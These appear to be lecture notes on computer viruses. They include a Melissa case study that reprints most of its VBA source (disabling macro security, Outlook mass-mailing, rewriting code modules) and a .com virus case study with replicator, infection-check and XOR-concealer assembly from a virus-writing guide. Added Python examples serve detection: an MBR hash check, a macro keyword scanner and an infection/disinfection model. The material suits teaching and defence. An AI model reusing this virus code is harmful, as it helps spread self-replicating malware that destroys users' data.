Viruses, Trojan Horses, and Worms

Propagation of malicious code
"Malicious" indicates the potential to do damage. Malicious code is usually classified by its type of propagation, and sometimes by the platform and mechanism it requires in order to run (e.g. macro viruses). A virus, Trojan or worm may not actually cause any damage.

Viruses
A program or piece of code that reproduces itself, and sometimes performs a particular action. Definition from RFC 1135: "A virus is a piece of code that inserts itself into a host, including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it."

Worm
A worm is similar to a virus, but it does not reproduce locally; it propagates between systems only. Definition from RFC 1135: "A worm is a program that can run independently, will consume the resources of its host from within in order to maintain itself and can propagate a complete working version of itself on to other machines."

Macro Virus
Sometimes considered worms. Macro viruses require a host application to process the macro in order to execute. They are often written in VBA (Visual Basic for Applications) for Word, Access, Excel, PowerPoint, Outlook, etc. E.g. Melissa.

Trojan Horses
Code disguised as a benign program that behaves in an unexpected, usually malicious, manner. The user needs to be convinced to accept and run it. E.g. the Pokemon worm, which displays an animated bouncing Pikachu on your screen while it e-mails itself to everyone in your address book and prepares to delete files.

The Trojan horse initially appears as an e-mail with the subject "Pikachu Pokemon" and the English message "Pikachu is your friend". The slide shows what users see when they execute pokemon.exe (the attachment). What they don't see is the application e-mailing itself and deleting files from the system.

Anatomy of a Virus
Two primary components: the propagation mechanism and the payload. Propagation is the method by which the virus spreads itself. In the old days a virus lived on a single PC and was transferred to other hosts by floppy diskette; nowadays it travels over the Internet.

Types of Propagation
Parasitic: propagates by being a parasite on other files, attaching itself in some manner that still leaves the original file usable. Examples: .com and .exe files of MS-DOS; macro viruses.
Boot sector infectors: copy themselves to the bootable portion of the hard (or floppy) disk. The virus gains control when the system is booted.

Normal boot procedure
The machine first goes through its usual POST (Power On Self Test). The BIOS (Basic Input/Output System) then does what is referred to as a bootstrap: checking for a valid bootable disk. For a hard drive to be bootable, it must contain a Master Boot Record (MBR): a chunk of code that lies in the first sector of the drive and understands the partition table.

The MBR code looks for the partition that is marked bootable (MS-DOS fdisk: "active") and transfers control to the code at the start of that partition. This code is known as the boot sector. Viruses have two opportunities to take control:
1. Insert themselves into the MBR position. They gain control under all circumstances, at the expense of having to deal with reading the partition table and booting via it.

2. Insert themselves into the boot sector of a partition. Boot sector viruses tend to take the existing MBR or boot sector code, relocate it elsewhere, and then insert themselves into the record. When the system boots, they do their thing, and then transfer control to the relocated code that they replaced.
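The boot path above can be followed in code. The example below is added here and is not from the original slides: it parses a 512-byte MBR the way the MBR code does (check the 55AA signature, walk the four partition entries, pick the one flagged active), and hashes the boot-code region in front of the partition table so that a replaced MBR, the first of the two infection points, shows up in an integrity check. The sample MBR is constructed inline; the partition-table layout and the 55AA signature are the standard PC-BIOS format, and the "infection" routine only models the relocate-and-replace trick described above.

```python
"""Added example (not from the original slides): parse an MBR, find the active
partition, and detect replaced boot code with a hash. Sample MBR is constructed."""
import hashlib
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 0x1BE   # four 16-byte entries
BOOT_SIGNATURE_OFFSET = 0x1FE    # 55 AA
ACTIVE_FLAG = 0x80

def parse_mbr(sector: bytes) -> dict:
    """Return the boot-code hash and the four partition entries of an MBR."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly one 512-byte sector")
    if sector[BOOT_SIGNATURE_OFFSET:] != b"\x55\xAA":
        raise ValueError("missing 55AA boot signature: not a bootable MBR")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        if status not in (0x00, ACTIVE_FLAG):
            raise ValueError(f"entry {i}: invalid status byte {status:#x}")
        partitions.append({"index": i, "active": status == ACTIVE_FLAG,
                           "type": ptype, "lba_start": lba_start, "sectors": sectors})
    return {"boot_code_sha256": hashlib.sha256(sector[:PARTITION_TABLE_OFFSET]).hexdigest(),
            "partitions": partitions}

def find_boot_partition(mbr: dict) -> dict:
    """Standard MBR code hands control to the single partition flagged active."""
    active = [p for p in mbr["partitions"] if p["active"]]
    if len(active) != 1:
        raise ValueError(f"expected exactly one active partition, found {len(active)}")
    return active[0]

def boot_code_changed(sector: bytes, known_good_sha256: str) -> bool:
    """Integrity check: has the code region in front of the partition table changed?"""
    return parse_mbr(sector)["boot_code_sha256"] != known_good_sha256

def build_sample_mbr() -> bytes:
    """Constructed MBR: placeholder boot code, one active type-0x83 partition at LBA 2048."""
    mbr = bytearray(SECTOR_SIZE)
    mbr[0:3] = b"\x33\xC0\xFA"                      # xor ax,ax ; cli  (stand-in boot code)
    mbr[PARTITION_TABLE_OFFSET:PARTITION_TABLE_OFFSET + 16] = struct.pack(
        "<B3xB3xII", ACTIVE_FLAG, 0x83, 2048, 204800)
    mbr[BOOT_SIGNATURE_OFFSET:] = b"\x55\xAA"
    return bytes(mbr)

def simulate_mbr_infection(sector: bytes) -> bytes:
    """Model the infection: overwrite the boot-code region only, leaving the
    partition table and signature intact (so a table-only check sees nothing)."""
    infected = bytearray(sector)
    infected[0:PARTITION_TABLE_OFFSET] = b"\xEB\xFE" + b"\x90" * (PARTITION_TABLE_OFFSET - 2)
    return bytes(infected)

if __name__ == "__main__":
    good = build_sample_mbr()
    baseline = parse_mbr(good)["boot_code_sha256"]
    print("boots from", find_boot_partition(parse_mbr(good)))
    print("changed after infection:", boot_code_changed(simulate_mbr_infection(good), baseline))
```

The point of hashing only bytes 0 to 0x1BD is that a legitimate repartitioning changes the table but not the code, whereas an MBR infector changes the code but usually leaves the table alone; an integrity checker that records the baseline hash at install time catches the second case without false-alarming on the first.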

Multi-partite
Refers to viruses that can use multiple means of infection, such as MBR, boot sector and parasitic.

Payload
Refers to what the virus does (besides propagation) once executed: do nothing; do cute things; malicious damage, such as deleting your partition table. Some viruses have a particular trigger, such as a date or a number of successful infections.

Smart viruses usually use an infrequent trigger so that they have ample time to propagate properly before alerting the user.

Case Study I: Melissa
Melissa works by infecting the Document_Open() macro of Microsoft Word, so it runs immediately when the user opens the Word file. The listing below is Melissa's VBA, broken up by what each part does.

Entry point; errors are silently ignored so that a failing step never shows the user a dialog:

    Private Sub Document_Open()
    On Error Resume Next

Disable the macro security features. Word 2000 keeps the macro security level in the registry key tested here; Melissa sets it to 1 (the lowest level) and disables the menu item that would let the user raise it. The Else branch handles Word 97, which instead exposes Options.VirusProtection:

    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        p$ = "clone"
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If

Set up Outlook through MAPI and check whether this host has already been infected. MAPI stands for "Messaging API", the way Windows applications interface with e-mail functionality. The registry value "Melissa?" under HKEY_CURRENT_USER\Software\Microsoft\Office\ is the infection marker: only if it is not yet "... by Kwyjibo" does the mass-mailing routine run.

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

Check that the application is Outlook, then compose one message addressed to the first 50 entries of each address list in the address book:

        If UngaDasOutlook = "Outlook" Then
            DasMapiName.Logon "profile", "password"
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x)
                    BreakUmOffASlice.Recipients.Add Peep
                    x = x + 1
                    If x > 50 Then oo = AddyBook.AddressEntries.Count
                Next oo

Actually send the e-mail with the infected document attached, then wrap up by writing the infection marker (the closing End If of the marker check is implied by the slides and added here):

                BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
                BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
                BreakUmOffASlice.Send
                Peep = ""
            Next y
            DasMapiName.Logoff
        End If
        p$ = "clone"
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
    End If

Check whether the active document and the document template (Normal.dot) are already infected. Any module not yet named "Melissa" has its existing code deleted and is marked for infection; if both are already infected, the routine skips to the end (label CYA):

    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then _
            ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If
    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then _
            NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo CYA

The remainder of the routine (not shown on the slides) copies the virus code into the marked module: into the active document as Document_Open(), and into the template as Document_Close(). Every new document created from the template therefore runs Melissa when it is closed or saved, and the current document is saved with the macro inside it.
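The behaviours in the listing above (an auto-run entry point, tampering with macro security, Outlook/MAPI mass-mailing, rewriting code modules through VBProject, a registry infection marker) are exactly what keyword-based macro triage keys on. The scanner below is an added example written for this page; it is not Melissa's code and not from the original slides. It runs a set of regular expressions over extracted VBA source and flags the Melissa pattern: an auto-run macro that also mails itself, rewrites code modules or lowers macro security. Both macro samples are constructed for the demo; the Melissa lines are the ones quoted on the slides. The rule names and thresholds are this example's own choices.

```python
"""Added example (not from the original slides and not Melissa's code): a
keyword-based heuristic scanner for VBA macro source. Samples are constructed."""
import re

# One pattern per behaviour visible in the Melissa listing.
RULES = {
    "autorun_entry_point": re.compile(
        r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b", re.I),
    "error_suppression": re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I),
    "macro_security_tampering": re.compile(
        r'Options\.VirusProtection\s*=|\\Word\\Security|Controls\("Security\.\.\."\)', re.I),
    "outlook_mass_mail": re.compile(
        r'CreateObject\("Outlook\.Application"\)|GetNameSpace\("MAPI"\)|Recipients\.Add', re.I),
    "self_replication": re.compile(
        r"VBProject\.VBComponents|CodeModule\.(DeleteLines|InsertLines|AddFromString)", re.I),
    "registry_marker": re.compile(r'PrivateProfileString\(\s*""\s*,\s*"HKEY_', re.I),
}

def scan_macro(source: str) -> set:
    """Return the names of all rules whose pattern occurs in the macro source."""
    return {name for name, rx in RULES.items() if rx.search(source)}

def is_suspicious(hits: set) -> bool:
    """An auto-run macro by itself is common and benign. An auto-run macro that
    also mails, self-replicates or lowers security is the Melissa pattern."""
    return "autorun_entry_point" in hits and bool(
        hits & {"outlook_mass_mail", "self_replication", "macro_security_tampering"})

# Constructed samples: a harmless AutoOpen, and lines quoted from the Melissa listing.
BENIGN_MACRO = r"""
Sub AutoOpen()
    MsgBox "Welcome to the quarterly report"
End Sub
"""

MELISSA_EXCERPT = r"""
Private Sub Document_Open()
On Error Resume Next
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1)
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
ADI1.CodeModule.DeleteLines 1, ADCL
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("melissa", MELISSA_EXCERPT)):
        hits = scan_macro(src)
        print(f"{label}: suspicious={is_suspicious(hits)} hits={sorted(hits)}")
```

The scanner needs the macro text, not the .doc file: extract the VBA first (the OLE stream parsing is out of scope here). Keyword matching is cheap and catches the original Melissa, but it is trivially evaded by string building or obfuscation, which is why the registry marker "Melissa?" = "... by Kwyjibo" and the modified Normal.dot are the more reliable host-side indicators for incident response.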

Case Study II: .com Virus
A .com virus may be divided into three parts: the replicator, the concealer, and the bomb (payload).

Replicator
Spreads the virus by attaching it to a .com file. The original file is viewed as two parts: P1, its first few bytes, and P2, the rest.

    The uninfected file:  | P1 | P2 |

The replicator copies a small portion of its code, V1, over the beginning of the file, saves the original P1 after P2, and appends the second part of itself, V2, at the end.

    The infected file:    | V1 | P2 | P1 | V2 |

What do V1 and V2 do? V1 transfers control of the program to V2.

The code to do this is simple:

        JMP FAR PTR Duh          ; Takes four bytes
    Duh DW V2_Start              ; Takes two bytes

The value of Duh must be changed to reflect the length of the file that is infected: Duh = length of V1 + original size of the infected file + 256 (to account for the 100h load address). E.g. if the file size is 79 and V1 is 6 bytes, Duh = 6 + 79 + 256 = 341.

Another approach is a near jump with a 2-byte displacement, which takes only three bytes. The displacement is relative to the end of the 3-byte instruction, i.e. to OFFSET Duh + 2:

        DB 11101001b             ; E9h, opcode for JMP (2-byte displacement)
    Duh DW V2_Start - OFFSET Duh - 2   ; 2-byte displacement

V2 contains the rest of the code. The last part of V2 copies P1 over V1 (in memory) and then transfers control to the beginning of the file (in memory):

    MOV  SI, V2_START      ; V2_START is a label marking where V2 starts
    SUB  SI, V1_LENGTH     ; Go back to where P1 is stored
    MOV  DI, 0100h         ; All COM files are loaded at CS:[100h] in memory
    MOV  CX, V1_LENGTH     ; Move CX bytes
    REP  MOVSB             ; DS:[SI] -> ES:[DI]
    MOV  DI, 0100h
    JMP  DI

The code assumes that P1 is located just before V2 and that ES equals CS. If these assumptions are false, change it accordingly:

    PUSH CS                ; Store CS
    POP  ES                ; and move it to ES (MOV ES, CS is not a valid instruction)
    MOV  SI, P1_START      ; Move from wherever P1 is stored
    MOV  DI, 0100h         ; to CS:[100h]
    MOV  CX, V1_LENGTH
    REP  MOVSB
    MOV  DI, 0100h
    JMP  DI

The code first moves CS into ES, then sets the source pointer of MOVSB to where P1 is located. Note that the offset of P1 in memory is 100h higher than its physical file location, as COM files are loaded starting at CS:[100h]. Infecting .EXE files is much more complicated.

Replicator steps:
1. Find a file to infect.
2. Check if it is already infected. If so, go back to 1.
3. Infect it.
4. If enough files have been infected, quit; otherwise go back to 1.

Finding a file to infect: write a directory traversal procedure that issues the DOS FINDFIRST and FINDNEXT calls.

Once you find a file, open it and read the first few bytes. If they are the same as the first few bytes of V1, the file is already infected. Infection should take the following steps:
1. Clear the file attributes (so a read-only or hidden file can be written).
2. Save the file date/time stamps.
3. Close the file.
4. Open it again in read/write mode.
5. Save P1 and append it to the end of the file.
6. Copy V1 to the beginning, but change the offset it JMPs to so that it transfers control correctly.
7. Append V2 to the end of the file.
8. Restore the file attributes and date/time stamps.

Sample code to check whether a file has been infected (BX holds the file handle from the open call). Rather than comparing V1 byte for byte, it checks whether the JMP displacement stored in bytes 1 and 2 points exactly at where V2 would sit, i.e. whether it equals file size - virus_size - 3:

        mov  ah, 3Fh                ; Read first three
        mov  cx, 3                  ; bytes of the file
        lea  dx, [bp+offset buffer] ; into the buffer
        int  21h
        mov  ax, 4202h              ; SEEK from EOF
        xor  cx, cx                 ; DX:CX = offset
        xor  dx, dx                 ; Returns file size
        int  21h                    ; in DX:AX
        sub  ax, virus_size + 3
        cmp  word ptr [bp+offset buffer+1], ax
        jnz  infect_it
    bomb_out:
        mov  ah, 3Eh                ; else close the file
        int  21h                    ; and go find another
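To see the layout, the JMP arithmetic and the infection check fit together, the example below models them on a byte string instead of a DOS file. It is an added example, not code from the slides or from Dark Angel's guide: it implements the V1 | P2 | P1 | V2 layout with V1 as the 3-byte near JMP (E9 rel16), the "already infected?" test from the assembly above, the reverse operation a disinfector would perform, and the concealer's XOR so you can see why the structural check still fires when the body bytes change. The x86 facts relied on are that COM files load at CS:0100h and that a JMP rel16 displacement is relative to the end of its own 3-byte instruction; the tiny COM program, the stub and the key values are constructed for the demo.

```python
"""Added example (not from the slides or Dark Angel's guide): byte-level model of
the .COM infection layout, the infection check and the XOR concealer."""
import struct

LOAD_OFFSET = 0x100   # COM files are loaded at CS:[100h]
V1_LEN = 3            # V1 = E9 lo hi (near JMP with 16-bit displacement)

def make_v1(infected_size: int, v2_len: int) -> bytes:
    """V1: near JMP from file offset 0 to V2, which occupies the last v2_len bytes."""
    v2_offset = infected_size - v2_len
    rel16 = v2_offset - V1_LEN           # displacement is relative to the byte after the JMP
    return b"\xE9" + struct.pack("<H", rel16 & 0xFFFF)

def infect(original: bytes, v2: bytes) -> bytes:
    """Replicator: V1 over P1, original P1 saved just before V2, V2 appended."""
    if len(original) < V1_LEN:
        raise ValueError("file too small to carry V1")
    p1, p2 = original[:V1_LEN], original[V1_LEN:]
    infected_size = len(original) + V1_LEN + len(v2)
    return make_v1(infected_size, len(v2)) + p2 + p1 + v2

def is_infected(data: bytes, v2_len: int) -> bool:
    """The slide's check: JMP at offset 0 whose displacement == filesize - virus_size - 3."""
    if len(data) < V1_LEN + v2_len or data[0] != 0xE9:
        return False
    rel16 = struct.unpack_from("<H", data, 1)[0]
    return rel16 == len(data) - v2_len - V1_LEN

def disinfect(data: bytes, v2_len: int) -> bytes:
    """Reverse the layout: P1 sits just before V2, P2 between V1 and P1."""
    p1 = data[-(v2_len + V1_LEN):-v2_len]
    p2 = data[V1_LEN:-(v2_len + V1_LEN)]
    return p1 + p2

def v2_memory_address(original_size: int, v1_len: int = 6) -> int:
    """The slide's 'Duh' for the 6-byte indirect-JMP form of V1: absolute in-memory
    offset of V2 = len(V1) + original file size + 100h."""
    return v1_len + original_size + LOAD_OFFSET

def xor_conceal(body: bytes, key: int) -> bytes:
    """Concealer: XOR with a one-byte key; the same call decrypts."""
    return bytes(b ^ key for b in body)

def demo() -> dict:
    """Infect a constructed COM file with two different XOR keys: the file bytes
    differ per key, but the structural check detects both and disinfection
    restores the original in both cases."""
    # mov ah,9 ; mov dx,108h ; int 21h ; ret ; "Hi$"   (constructed 11-byte COM program)
    original = b"\xB4\x09\xBA\x08\x01\xCD\x21\xC3Hi$"
    stub = b"\xB8\x00\x4C\xCD\x21"   # stand-in for the decryptor/exit stub: mov ax,4C00h ; int 21h
    body = b"BOMB"                   # stand-in for the encrypted part of V2
    out = {}
    for key in (0x00, 0x5A):
        v2 = stub + xor_conceal(body, key)
        infected = infect(original, v2)
        out[key] = {"infected": infected,
                    "detected": is_infected(infected, len(v2)),
                    "restored": disinfect(infected, len(v2)) == original}
    return out

if __name__ == "__main__":
    for key, r in demo().items():
        print(f"key={key:#04x} detected={r['detected']} restored={r['restored']} "
              f"bytes={r['infected'].hex()}")
```

Two things worth noticing. First, with the 3-byte V1 the displacement always comes out equal to the original file size (the three bytes V1 adds and the three it replaces cancel), which is why the assembly check can be a single compare. Second, the check is structural, so it is immune to the XOR concealer but also produces a false positive for any clean program that happens to start with a JMP whose displacement equals its size minus the virus length; the byte-for-byte comparison of V1 the slide mentions earlier is the stricter test.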

Concealer
Conceals the program from the everyday user and from virus scanners. A simple XOR encryption; the same routine encrypts and decrypts, since XOR is its own inverse:

    encrypt_val db ?
    decrypt:
    encrypt:
        mov  ah, encrypt_val
        mov  cx, part_to_encrypt_end - part_to_encrypt_start
        mov  si, part_to_encrypt_start
        mov  di, si
    xor_loop:
        lodsb                   ; DS:[SI] -> AL
        xor  al, ah
        stosb                   ; AL -> ES:[DI]
        loop xor_loop
        ret

Bomb
Does all the nasty things that annoy the user. Some possible bombs: system slowdown (easily done by trapping an interrupt and causing a delay when it activates); file deletion; message display; killing or replacing the partition table or boot sector of the hard drive.

Anti-virus Techniques
Integrity and behavioral checkers. Use a good OS. Use a virus scanner on the computer and on the e-mail server. Do not open e-mail attachments. Make frequent backups.

References
Kevin L. Poulsen, "Hack Proofing Your Network: Internet Tradecraft", Chapter 14, pp. 383-405.
Dark Angel's Phunky Virus Writing Guide, http://www.sirkussystem.com/virus.html (Introduction; Installment II: The Replicator).